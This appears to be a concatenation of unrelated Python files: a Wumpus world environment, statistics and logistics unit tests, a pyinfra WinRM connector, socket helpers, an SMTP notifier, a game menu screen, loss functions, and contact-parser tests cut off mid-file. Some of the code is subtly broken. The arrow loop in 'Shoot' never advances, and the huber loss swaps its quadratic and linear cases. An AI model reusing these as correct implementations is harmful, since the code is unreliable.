result.append(self.percepts_from(agent, (x, y + 1)))
result.append(self.percepts_from(agent, (x, y)))
"""The wumpus gives out a a loud scream once it's killed."""
wumpus = [thing for thing in self.things if isinstance(thing, Wumpus)]
if len(wumpus) and not wumpus[0].alive and not wumpus[0].screamed:
result[-1].append(Scream())
wumpus[0].screamed = True
return result
def execute_action(self, agent, action):
"""Modify the state of the environment based on the agent's actions.
Performance score taken directly out of the book."""
if isinstance(agent, Explorer) and self.in_danger(agent):
return
agent.bump = False
if action == 'TurnRight':
agent.direction = agent.direction + Direction.R
agent.performance -= 1
elif action == 'TurnLeft':
agent.direction = agent.direction + Direction.L
agent.performance -= 1
elif action == 'Forward':
agent.bump = self.move_to(agent, agent.direction.move_forward(agent.location))
agent.performance -= 1
elif action == 'Grab':
things = [thing for thing in self.list_things_at(agent.location)
if agent.can_grab(thing)]
if len(things):
print("Grabbing", things[0].__class__.__name__)
if len(things):
agent.holding.append(things[0])
agent.performance -= 1
elif action == 'Climb':
if agent.location == (1, 1): # Agent can only climb out of (1,1)
agent.performance += 1000 if Gold() in agent.holding else 0
self.delete_thing(agent)
elif action == 'Shoot':
"""The arrow travels straight down the path the agent is facing"""
if agent.has_arrow:
arrow_travel = agent.direction.move_forward(agent.location)
while(self.is_inbounds(arrow_travel)):
wumpus = [thing for thing in self.list_things_at(arrow_travel)
if isinstance(thing, Wumpus)]
if len(wumpus):
wumpus[0].alive = False
break
arrow_travel = agent.direction.move_forward(agent.location)
agent.has_arrow = False
def in_danger(self, agent):
"""Checks if Explorer is in danger (Pit or Wumpus), if he is, kill him"""
for thing in self.list_things_at(agent.location):
if isinstance(thing, Pit) or (isinstance(thing, Wumpus) and thing.alive):
agent.alive = False
agent.performance -= 1000
agent.killed_by = thing.__class__.__name__
return True
return False
def is_done(self):
"""The game is over when the Explorer is killed
or if he climbs out of the cave only at (1,1)."""
explorer = [agent for agent in self.agents if isinstance(agent, Explorer)]
if len(explorer):
if explorer[0].alive:
return False
else:
print("Death by {} [-1000].".format(explorer[0].killed_by))
else:
print("Explorer climbed out {}."
.format(
"with Gold [+1000]!" if Gold() not in self.things else "without Gold [+0]"))
return True
# Almost done. Arrow needs to be implemented
# ______________________________________________________________________________
def compare_agents(EnvFactory, AgentFactories, n=10, steps=1000):
"""See how well each of several agents do in n instances of an environment.
Pass in a factory (constructor) for environments, and several for agents.
Create n instances of the environment, and run each agent in copies of
each one for steps. Return a list of (agent, average-score) tuples."""
envs = [EnvFactory() for i in range(n)]
return [(A, test_agent(A, steps, copy.deepcopy(envs)))
for A in AgentFactories]
def test_agent(AgentFactory, steps, envs):
"""Return the mean score of running an agent in each of the envs, for steps"""
def score(env):
agent = AgentFactory()
env.add_thing(agent)
env.run(steps)
return agent.performance
return mean(map(score, envs))
# _________________________________________________________________________
__doc__ += """
>>> a = ReflexVacuumAgent()
>>> a.program((loc_A, 'Clean'))
'Right'
>>> a.program((loc_B, 'Clean'))
'Left'
>>> a.program((loc_A, 'Dirty'))
'Suck'
>>> a.program((loc_A, 'Dirty'))
'Suck'
>>> e = TrivialVacuumEnvironment()
>>> e.add_thing(ModelBasedVacuumAgent())
>>> e.run(5)
"""
|
import unittest
import numpy as np
import scipy.stats as st
from ..analysis import Correlation
from ..analysis.exc import MinimumSizeError, NoDataError
from ..data import UnequalVectorLengthError, Vector
class MyTestCase(unittest.TestCase):
def test_Correlation_corr_pearson(self):
"""Test the Correlation class for correlated normally distributed data"""
np.random.seed(987654321)
x_input_array = list(st.norm.rvs(size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.05
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0500
r value = 0.8904
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation pearson Type II error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, 0.8904, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.8904, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_no_corr_pearson(self):
"""Test the Correlation class for uncorrelated normally distributed data"""
np.random.seed(987654321)
x_input_array = st.norm.rvs(size=100)
y_input_array = st.norm.rvs(size=100)
alpha = 0.05
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0500
r value = -0.0055
p value = 0.9567
H0: There is no significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertGreater(exp.p_value, alpha, "FAIL: Correlation pearson Type I error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, -0.0055, delta=0.0001)
self.assertAlmostEqual(exp.statistic, -0.0055, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.9567, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_corr_spearman(self):
"""Test the Correlation class for correlated randomly distributed data"""
np.random.seed(987654321)
x_input_array = list(st.weibull_min.rvs(1.7, size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.05
output = """
Spearman Correlation Coefficient
--------------------------------
alpha = 0.0500
r value = 0.7271
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation spearman Type II error")
self.assertEqual(exp.test_type, 'spearman')
self.assertAlmostEqual(exp.r_value, 0.7271, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.7271, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_no_corr_spearman(self):
"""Test the Correlation class for uncorrelated randomly distributed data"""
np.random.seed(987654321)
x_input_array = st.norm.rvs(size=100)
y_input_array = st.weibull_min.rvs(1.7, size=100)
alpha = 0.05
output = """
Spearman Correlation Coefficient
--------------------------------
alpha = 0.0500
r value = -0.0528
p value = 0.6021
H0: There is no significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertGreater(exp.p_value, alpha, "FAIL: Correlation spearman Type I error")
self.assertEqual(exp.test_type, 'spearman')
self.assertAlmostEqual(exp.r_value, -0.0528, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.6021, delta=0.0001)
self.assertAlmostEqual(exp.statistic, -0.0528, delta=0.0001)
self.assertTrue(np.array_equal(x_input_array, exp.xdata))
self.assertTrue(np.array_equal(x_input_array, exp.predictor))
self.assertTrue(np.array_equal(y_input_array, exp.ydata))
self.assertTrue(np.array_equal(y_input_array, exp.response))
self.assertEqual(str(exp), output)
def test_Correlation_no_corr_pearson_just_above_min_size(self):
"""Test the Correlation class for uncorrelated normally distributed data just above the minimum size"""
np.random.seed(987654321)
alpha = 0.05
self.assertTrue(Correlation(st.norm.rvs(size=4),
st.norm.rvs(size=4),
alpha=alpha,
display=False).p_value,
"FAIL: Correlation pearson just above minimum size")
def test_Correlation_no_corr_pearson_at_min_size(self):
"""Test the Correlation class for uncorrelated normally distributed data at the minimum size"""
np.random.seed(987654321)
alpha = 0.05
self.assertRaises(MinimumSizeError, lambda: Correlation(st.norm.rvs(size=3),
st.norm.rvs(size=3),
alpha=alpha,
display=False).p_value)
def test_Correlation_no_corr_pearson_unequal_vectors(self):
"""Test the Correlation class for uncorrelated normally distributed data with unequal vectors"""
np.random.seed(987654321)
alpha = 0.05
x_input_array = st.norm.rvs(size=87)
y_input_array = st.norm.rvs(size=100)
self.assertRaises(UnequalVectorLengthError, lambda: Correlation(x_input_array, y_input_array,
alpha=alpha,
display=False).p_value)
def test_Correlation_no_corr_pearson_empty_vector(self):
"""Test the Correlation class for uncorrelated normally distributed data with an empty vector"""
np.random.seed(987654321)
alpha = 0.05
self.assertRaises(NoDataError, lambda: Correlation(["one", "two", "three", "four", "five"],
st.norm.rvs(size=5),
alpha=alpha,
display=False).p_value)
def test_Correlation_vector(self):
"""Test the Correlation class with an input Vector"""
np.random.seed(987654321)
x_input_array = list(st.norm.rvs(size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.05
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0500
r value = 0.8904
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(Vector(x_input_array, other=y_input_array), alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation pearson Type II error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, 0.8904, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.8904, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_vector_alpha(self):
"""Test the Correlation class with an input Vector and different alpha"""
np.random.seed(987654321)
x_input_array = list(st.norm.rvs(size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.01
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0100
r value = 0.8904
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(Vector(x_input_array, other=y_input_array), alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation pearson Type II error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, 0.8904, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.8904, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_missing_ydata(self):
"""Test the case where no ydata is given."""
np.random.seed(987654321)
x_input_array = range(1, 101)
self.assertRaises(AttributeError, lambda: Correlation(x_input_array))
if __name__ == '__main__':
unittest.main()
|
from __future__ import print_function, unicode_literals
import base64
import ntpath
import click
from pyinfra import logger
from pyinfra.api import Config
from pyinfra.api.exceptions import ConnectError, PyinfraError
from pyinfra.api.util import get_file_io, memoize, sha1_hash
from .pyinfrawinrmsession import PyinfraWinrmSession
from .util import make_win_command
def _raise_connect_error(host, message, data):
message = '{0} ({1})'.format(message, data)
raise ConnectError(message)
@memoize
def show_warning():
logger.warning('The @winrm connector is alpha!')
def _make_winrm_kwargs(state, host):
kwargs = {
}
for key, value in (
('username', host.data.winrm_user),
('password', host.data.winrm_password),
('winrm_port', int(host.data.winrm_port or 0)),
('winrm_transport', host.data.winrm_transport or 'plaintext'),
('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30),
('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20),
):
if value:
kwargs[key] = value
# FUTURE: add more auth
# pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp
# see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12
return kwargs
def make_names_data(hostname):
show_warning()
yield '@winrm/{0}'.format(hostname), {'winrm_hostname': hostname}, []
def connect(state, host):
'''
Connect to a single host. Returns the winrm Session if successful.
'''
kwargs = _make_winrm_kwargs(state, host)
logger.debug('Connecting to: %s (%s)', host.name, kwargs)
# Hostname can be provided via winrm config (alias), data, or the hosts name
hostname = kwargs.pop(
'hostname',
host.data.winrm_hostname or host.name,
)
try:
# Create new session
host_and_port = '{}:{}'.format(hostname, host.data.winrm_port)
logger.debug('host_and_port: %s', host_and_port)
session = PyinfraWinrmSession(
host_and_port,
auth=(
kwargs['username'],
kwargs['password'],
),
transport=kwargs['winrm_transport'],
read_timeout_sec=kwargs['winrm_read_timeout_sec'],
operation_timeout_sec=kwargs['winrm_operation_timeout_sec'],
)
return session
# TODO: add exceptions here
except Exception as e:
auth_kwargs = {}
for key, value in kwargs.items():
if key in ('username', 'password'):
auth_kwargs[key] = value
auth_args = ', '.join(
'{0}={1}'.format(key, value)
for key, value in auth_kwargs.items()
)
logger.debug('%s', e)
_raise_connect_error(host, 'Authentication error', auth_args)
def run_shell_command(
state, host, command,
env=None,
success_exit_codes=None,
print_output=False,
print_input=False,
return_combined_output=False,
shell_executable=Config.SHELL,
**ignored_command_kwargs
):
'''
Execute a command on the specified host.
Args:
state (``pyinfra.api.State`` obj): state object for this command
hostname (string): hostname of the target
command (string): actual command to execute
success_exit_codes (list): all values in the list that will return success
print_output (boolean): print the output
print_intput (boolean): print the input
return_combined_output (boolean): combine the stdout and stderr lists
shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell(default)
env (dict): environment variables to set
Returns:
tuple: (exit_code, stdout, stderr)
stdout and stderr are both lists of strings from each buffer.
'''
command = make_win_command(command)
logger.debug('Running command on %s: %s', host.name, command)
if print_input:
click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True)
# get rid of leading/trailing quote
tmp_command = command.strip("'")
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, command),
err=True,
)
if not shell_executable:
shell_executable = 'ps'
logger.debug('shell_executable:%s', shell_executable)
# we use our own subclassed session that allows for env setting from open_shell.
if shell_executable in ['cmd']:
response = host.connection.run_cmd(tmp_command, env=env)
else:
response = host.connection.run_ps(tmp_command, env=env)
return_code = response.status_code
logger.debug('response:%s', response)
std_out_str = response.std_out.decode('utf-8')
std_err_str = response.std_err.decode('utf-8')
# split on '\r\n' (windows newlines)
std_out = std_out_str.split('\r\n')
std_err = std_err_str.split('\r\n')
logger.debug('std_out:%s', std_out)
logger.debug('std_err:%s', std_err)
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)),
err=True,
)
if success_exit_codes:
status = return_code in success_exit_codes
else:
status = return_code == 0
logger.debug('Command exit status: %s', status)
if return_combined_output:
std_out = [('stdout', line) for line in std_out]
std_err = [('stderr', line) for line in std_err]
return status, std_out + std_err
return status, std_out, std_err
def get_file(
state, host, remote_filename, filename_or_io,
**command_kwargs
):
raise PyinfraError('Not implemented')
def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):
# this should work fine on smallish files, but there will be perf issues
# on larger files both due to the full read, the base64 encoding, and
# the latency when sending chunks
with get_file_io(filename_or_io) as file_io:
data = file_io.read()
for i in range(0, len(data), chunk_size):
chunk = data[i:i + chunk_size]
ps = (
'$data = [System.Convert]::FromBase64String("{0}"); '
'{1} -Value $data -Encoding byte -Path "{2}"'
).format(
base64.b64encode(chunk).decode('utf-8'),
'Set-Content' if i == 0 else 'Add-Content',
remote_location)
status, _stdout, stderr = run_shell_command(state, host, ps)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
return True
def put_file(
state, host, filename_or_io, remote_filename,
print_output=False, print_input=False,
**command_kwargs
):
'''
Upload file by chunking and sending base64 encoded via winrm
'''
# Always use temp file here in case of failure
temp_file = ntpath.join(
host.fact.windows_temp_dir(),
'pyinfra-{0}'.format(sha1_hash(remote_filename)),
)
if not _put_file(state, host, filename_or_io, temp_file):
return False
# Execute run_shell_command w/sudo and/or su_user
command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename)
status, _, stderr = run_shell_command(
state, host, command,
print_output=print_output,
print_input=print_input,
**command_kwargs
)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
if print_output:
click.echo(
'{0}file uploaded: {1}'.format(host.print_prefix, remote_filename),
err=True,
)
return True
EXECUTION_CONNECTOR = True
|
import datetime
from couchdbkit.exceptions import ResourceNotFound
from casexml.apps.stock.consumption import ConsumptionConfiguration
from couchforms.models import XFormInstance
from corehq import Domain
from corehq.apps.accounting import generator
from corehq.apps.commtrack.models import CommtrackConfig, CommtrackActionConfig, StockState, ConsumptionConfig
from corehq.apps.commtrack.tests.util import TEST_BACKEND, make_loc
from corehq.apps.locations.models import Location, SQLLocation, LocationType
from corehq.apps.products.models import Product, SQLProduct
from corehq.apps.sms.backend import test
from corehq.apps.sms.mixin import MobileBackend
from corehq.apps.users.models import CommCareUser
from custom.ewsghana.models import EWSGhanaConfig
from custom.ewsghana.utils import prepare_domain, bootstrap_user
from custom.logistics.test.test_script import TestScript
from casexml.apps.stock.models import StockReport, StockTransaction
from casexml.apps.stock.models import DocDomainMapping
TEST_DOMAIN = 'ewsghana-test'
class EWSScriptTest(TestScript):
def _create_stock_state(self, product, consumption):
xform = XFormInstance.get('test-xform')
loc = Location.by_site_code(TEST_DOMAIN, 'garms')
now = datetime.datetime.utcnow()
report = StockReport(
form_id=xform._id,
date=(now - datetime.timedelta(days=10)).replace(second=0, microsecond=0),
type='balance',
domain=TEST_DOMAIN
)
report.save()
stock_transaction = StockTransaction(
case_id=loc.linked_supply_point().get_id,
product_id=product.get_id,
sql_product=SQLProduct.objects.get(product_id=product.get_id),
section_id='stock',
type='stockonhand',
stock_on_hand=2 * consumption,
report=report
)
stock_transaction.save()
report = StockReport(
form_id=xform._id,
date=now.replace(second=0, microsecond=0),
type='balance',
domain=TEST_DOMAIN
)
report.save()
stock_transaction = StockTransaction(
case_id=loc.linked_supply_point().get_id,
product_id=product.get_id,
sql_product=SQLProduct.objects.get(product_id=product.get_id),
section_id='stock',
type='stockonhand',
stock_on_hand=consumption,
report=report
)
stock_transaction.save()
def setUp(self):
p1 = Product.get_by_code(TEST_DOMAIN, 'mc')
p2 = Product.get_by_code(TEST_DOMAIN, 'lf')
p3 = Product.get_by_code(TEST_DOMAIN, 'mg')
self._create_stock_state(p1, 5)
self._create_stock_state(p2, 10)
self._create_stock_state(p3, 5)
def tearDown(self):
StockTransaction.objects.all().delete()
StockReport.objects.all().delete()
StockState.objects.all().delete()
DocDomainMapping.objects.all().delete()
@classmethod
def setUpClass(cls):
domain = prepare_domain(TEST_DOMAIN)
p = Product(domain=domain.name, name='Jadelle', code='jd', unit='each')
p.save()
p2 = Product(domain=domain.name, name='Male Condom', code='mc', unit='each')
p2.save()
p3 = Product(domain=domain.name, name='Lofem', code='lf', unit='each')
p3.save()
p4 = Product(domain=domain.name, name='Ng', code='ng', unit='each')
p4.save()
p5 = Product(domain=domain.name, name='Micro-G', code='mg', unit='each')
p5.save()
loc = make_loc(code="garms", name="Test RMS", type="Regional Medical Store", domain=domain.name)
test.bootstrap(TEST_BACKEND, to_console=True)
bootstrap_user(username='stella', domain=domain.name, home_loc=loc)
bootstrap_user(username='super', domain=domain.name, home_loc=loc,
phone_number='222222', user_data={'role': 'In Charge'})
try:
XFormInstance.get(docid='test-xform')
except ResourceNotFound:
xform = XFormInstance(_id='test-xform')
xform.save()
sql_location = loc.sql_location
sql_location.products = SQLProduct.objects.filter(product_id=p5.get_id)
sql_location.save()
config = CommtrackConfig.for_domain(domain.name)
config.actions.append(
CommtrackActionConfig(
action='receipts',
keyword='rec',
caption='receipts'
)
)
config.consumption_config = ConsumptionConfig(min_transactions=0, min_window=0, optimal_window=60)
config.save()
@classmethod
def tearDownClass(cls):
MobileBackend.load_by_name(TEST_DOMAIN, TEST_BACKEND).delete()
CommCareUser.get_by_username('stella').delete()
CommCareUser.get_by_username('super').delete()
SQLLocation.objects.all().delete()
LocationType.objects.all().delete()
for product in Product.by_domain(TEST_DOMAIN):
product.delete()
SQLProduct.objects.all().delete()
EWSGhanaConfig.for_domain(TEST_DOMAIN).delete()
DocDomainMapping.objects.all().delete()
Location.by_site_code(TEST_DOMAIN, 'garms').delete()
generator.delete_all_subscriptions()
Domain.get_by_name(TEST_DOMAIN).delete()
def assign_products_to_location():
ng = SQLProduct.objects.get(domain=TEST_DOMAIN, code='ng')
jd = SQLProduct.objects.get(domain=TEST_DOMAIN, code='jd')
mg = SQLProduct.objects.get(domain=TEST_DOMAIN, code='mg')
location = SQLLocation.objects.get(domain=TEST_DOMAIN, site_code='garms')
location.products = [ng, jd, mg]
location.save()
def restore_location_products():
location = SQLLocation.objects.get(domain=TEST_DOMAIN, site_code='garms')
mg = SQLProduct.objects.get(domain=TEST_DOMAIN, code='mg')
location.products = [mg]
location.save()
|
#
# (C) Copyright 2011 Jacek Konieczny <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# pylint: disable-msg=W0201
"""Utility functions to wait until a socket (or object implementing .fileno()
in POSIX) is ready for input or output."""
from __future__ import absolute_import, division
__docformat__ = "restructuredtext en"
import select
if hasattr(select, "poll"):
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLIN)
events = poll.poll(timeout)
return bool(events)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLOUT)
events = poll.poll(timeout)
return bool(events)
else:
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
readable = select.select([socket], [], [], timeout)[0]
return bool(readable)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
writable = select.select([], [socket], [], timeout)[1]
return bool(writable)
|
# -*- coding: utf-8 -*-
'''
Created on 11 jan. 2017
@author: Fredrick
'''
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class Notifier(object):
'''
Sends email notifications.
'''
def __init__(self, args, conf):
'''
Constructor
'''
self.server = conf["EMAIL"]["server"]
self.port = int(conf["EMAIL"]["port"])
self.username = conf["EMAIL"]["username"]
self.password = conf["EMAIL"]["password"]
self.sender = conf["EMAIL"]["sender"]
self.recipient = conf["EMAIL"]["recipient"]
self.siteURL = conf["SITE"]["url"]
self.args = args
def notify(self, count):
""" Send report email """
try:
if (self.args.debug or self.args.verbose):
print("Constructing email...")
msg = MIMEMultipart()
msg['From'] = self.sender
msg['To'] = self.recipient
msg['Subject'] = "MindArk Monitoring System"
body = """A new position at MindArk was found!
Hurry, go there an take a look.""" + self.siteURL
msg.attach(MIMEText(body, 'plain'))
if (self.args.debug or self.args.verbose):
print("Email constructed.")
if (self.args.debug or self.args.verbose):
print("Signing in...")
server = smtplib.SMTP(self.server, self.port)
server.starttls()
server.login(self.username, self.password)
if (self.args.debug or self.args.verbose):
print("Signed in.")
if (self.args.debug or self.args.verbose):
print("Sending email.")
text = msg.as_string()
server.sendmail(self.sender, self.recipient, text)
server.quit()
if (self.args.debug or self.args.verbose):
print("Email sent.")
except Exception:
return False
return True
|
from galaxdustk.buttons import Button, CircularSelectButton, SelectButton
from galaxdustk.label import Label
from galaxdustk.screen import BaseScreen
import handlers
from gettext import gettext as _
class NewGameScreen(BaseScreen):
background_path = 'data/images/backgrounds/menu.png'
def __init__(self, context):
super(NewGameScreen,self).__init__(context)
screenrect = self.context.screen.get_rect()
label_species = Label(_('Select your specie:'))
label_species.rect.left = 10
label_species.rect.centery = 100
self.sprites.add(label_species)
for x in range(1,4):
specie = CircularSelectButton(self, 'data/images/species/specie%d.png' % x)
specie.rect.left = (label_species.rect.right - 100) + (x*125)
specie.rect.centery = 100
specie.group_id = 1
specie.value = x
self.sprites.add(specie)
label_size = Label(_('Select the galaxy size:'))
label_size.rect.left = 10
label_size.rect.centery = 200
self.sprites.add(label_size)
for galaxy_size in [(1,_('Small')),(2,_('Medium')),(3,_('Big'))]:
size = SelectButton(self, galaxy_size[1], width=100)
size.rect.left = (label_size.rect.right - 100) + (galaxy_size[0]*125)
size.rect.centery = 200
size.group_id = 2
size.value = galaxy_size[0]
self.sprites.add(size)
label_size = Label(_('Select your color:'))
label_size.rect.left = 10
label_size.rect.centery = 300
self.sprites.add(label_size)
for player_color in [(1,_('Red'), (255,0,0)),(2,_('Green'), (0,255,0)),(3,_('Blue'), (0,0,255))]:
one_color = SelectButton(self, player_color[1], width=100)
one_color.rect.left = (label_size.rect.right - 100) + (player_color[0]*125)
one_color.rect.centery = 300
one_color.group_id = 3
one_color.value = player_color[2]
self.sprites.add(one_color)
begin_game = Button(self, _("Begin the game"))
begin_game.rect.right = screenrect.right - 10
begin_game.rect.bottom = screenrect.bottom - 10
begin_game.connect("clicked", handlers.startgame)
self.sprites.add(begin_game)
back = Button(self, _("Back"))
back.rect.left = screenrect.left + 10
back.rect.bottom = screenrect.bottom - 10
back.connect("clicked", handlers.go_to_menu)
self.sprites.add(back)
|
"""Table of Contents
-modified_huber
-hinge
-squared_hinge
-log
-squared
-huber
-epsilon_insensitive
-squared_epislon_insensitive
-alpha_huber
-absolute
"""
import numpy as np
def modified_huber(p, y):
"""Modified Huber loss for binary classification with y in {-1, 1}; equivalent to quadratically smoothed SVM with gamma = 2
"""
z = p * y
loss = -4.0 * z
idx = z >= -1.0
loss[idx] = (z[idx] - 1.0) ** 2
loss[z >= 1.0] = 0.0
return loss
def hinge(p, y, threshold=1.0):
"""Hinge loss for binary classification tasks with y in {-1,1}
Parameters
----------
threshold : float > 0.0
Margin threshold. When threshold=1.0, one gets the loss used by SVM.
When threshold=0.0, one gets the loss used by the Perceptron.
"""
z = p * y
loss = threshold - z
loss[loss < 0] = 0.0
return loss
def squared_hinge(p, y, threshold=1.0):
"""Squared Hinge loss for binary classification tasks with y in {-1,1}
Parameters
----------
threshold : float > 0.0
Margin threshold. When threshold=1.0, one gets the loss used by
(quadratically penalized) SVM.
"""
return hinge(p, y, threshold) ** 2
def log(p, y):
"""Logistic regression loss for binary classification with y in {-1, 1}"""
z = p * y
return np.log(1.0 + np.exp(-z))
def squared(p, y):
"""Squared loss traditional used in linear regression."""
return 0.5 * (p - y) ** 2
def huber(p, y, epsilon=0.1):
"""Huber regression loss
Variant of the SquaredLoss that is robust to outliers (quadratic near zero,
linear in for large errors).
http://en.wikipedia.org/wiki/Huber_Loss_Function
"""
abs_r = np.abs(p - y)
loss = 0.5 * abs_r ** 2
idx = abs_r <= epsilon
loss[idx] = epsilon * abs_r[idx] - 0.5 * epsilon ** 2
return loss
def epsilon_insensitive(p, y, epsilon=0.1):
"""Epsilon-Insensitive loss (used by SVR).
loss = max(0, |y - p| - epsilon)
"""
loss = np.abs(y - p) - epsilon
loss[loss < 0.0] = 0.0
return loss
def squared_epislon_insensitive(p, y, epsilon=0.1):
"""Epsilon-Insensitive loss.
loss = max(0, |y - p| - epsilon)^2
"""
return epsilon_insensitive(p, y, epsilon) ** 2
def alpha_huber(p, y, alpha=0.9):
""" sets the epislon in huber loss equal to a percentile of the residuals
"""
abs_r = np.abs(p - y)
loss = 0.5 * abs_r ** 2
epsilon = np.percentile(loss, alpha * 100)
idx = abs_r <= epsilon
loss[idx] = epsilon * abs_r[idx] - 0.5 * epsilon ** 2
return loss
def absolute(p, y):
""" absolute value of loss
"""
return np.abs(p - y)
|
from os import path
from go.vumitools.tests.helpers import djangotest_imports
parser_classes = ['CSVFileParser', 'XLSFileParser']
with djangotest_imports(globals(), dummy_classes=parser_classes):
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from go.base.tests.helpers import GoDjangoTestCase
from go.contacts.parsers import ContactParserException
from go.contacts.parsers.csv_parser import CSVFileParser
from go.contacts.parsers.xls_parser import XLSFileParser
class ParserTestCase(GoDjangoTestCase):
def setUp(self):
self.parser = self.PARSER_CLASS()
def fixture(self, fixture_name):
fixture_path = path.join(settings.PROJECT_ROOT, 'base', 'fixtures',
fixture_name)
content_file = ContentFile(open(fixture_path, 'r').read())
fpath = default_storage.save('tmp/%s' % (fixture_name,), content_file)
self.add_cleanup(default_storage.delete, fpath)
return fpath
class TestCSVParser(ParserTestCase):
PARSER_CLASS = CSVFileParser
def test_guess_headers_and_row_without_headers(self):
csv_file = self.fixture('sample-contacts.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'name': 'Name 1',
'surname': 'Surname 1',
'msisdn': '+27761234561',
})
def test_guess_headers_and_row_with_key_header(self):
csv_file = self.fixture('sample-contacts-with-key-header.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'key': 'foo',
'surname': 'Surname 1',
})
def test_guess_headers_and_row_one_column_with_plus(self):
csv_file = self.fixture('sample-contacts-one-column-with-plus.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {'msisdn': '+27761234561'})
def test_contacts_parsing(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'surname': 'Surname 2',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
